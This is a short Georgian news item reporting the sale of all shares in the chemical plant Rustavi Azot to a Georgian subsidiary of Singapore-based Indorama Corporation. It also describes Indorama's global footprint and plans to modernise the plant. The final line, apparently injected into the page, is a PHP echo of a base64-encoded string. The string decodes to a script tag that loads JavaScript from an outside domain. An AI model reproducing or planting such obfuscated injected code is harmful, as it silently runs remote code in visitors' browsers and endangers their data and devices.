celsiusi
ავერსი შნაიდერი
კომპანია - სს „ე უ ინვესთმენთსმა“ სააქციო საზოგადოება „რუსთავის აზოტის“, აქციათა 100% გაყიდა. 
 
მყიდველი სინგაპურში ბაზირებული მულტი-ნაციონალური საერთაშორისო კორპორაცია - Indorama Corporation - ის ქართული შვილობილი კომპანიაა. 
ინდორამა მსოფლიოში ერთ-ერთ ყველაზე მსხვილი კონგლომერატია, რომელიც აერთიანებს მინერალური სასუქების, ინდუსტრიული ქიმიკატებისა და სხვადასხვა ქიმიური პროდუქტების მწარმოებელ საწარმოებს. კორპორაცია ფლობს 160-ზე მეტ საწარმოს მსოფლიოს 38 ქვეყანაში, მათ შორის ევროპის, აზიის, აფრიკის, ჩრდილოეთ და ლათინური ამერიკის კონტინენტებზე და დასაქმებული ჰყავს 45 000 ათასზე მეტი ადამიანი.
ინდორამა საქართველოში ერთ-ერთი ყველაზე მსხვილი სტრატეგიული ინვესტორია. კორპორაცია მომდევნო წლების განმავლობაში მნიშვნელოვანი ფინანსური რესურსის ინვესტირებას გეგმავს რუსთავის აზოტის საწარმოს მოდერნიზების, განვითარებისა და წარმოების გაფართოების მიმართულებით.
 
ცნობისთვის, სააქციო საზოგადოება „რუსთავის აზოტი“ კავკასიის რეგიონში მინერალური სასუქებისა და ინდუსტრიული ქიმიკატების ერთ-ერთ ყველაზე მსხვილ საწარმოს წარმოადგენს. 
1056
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");